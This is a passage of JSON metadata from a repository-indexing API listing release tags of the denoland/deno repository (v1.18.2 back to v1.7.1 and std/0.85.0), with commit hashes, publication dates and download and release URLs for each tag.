.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denol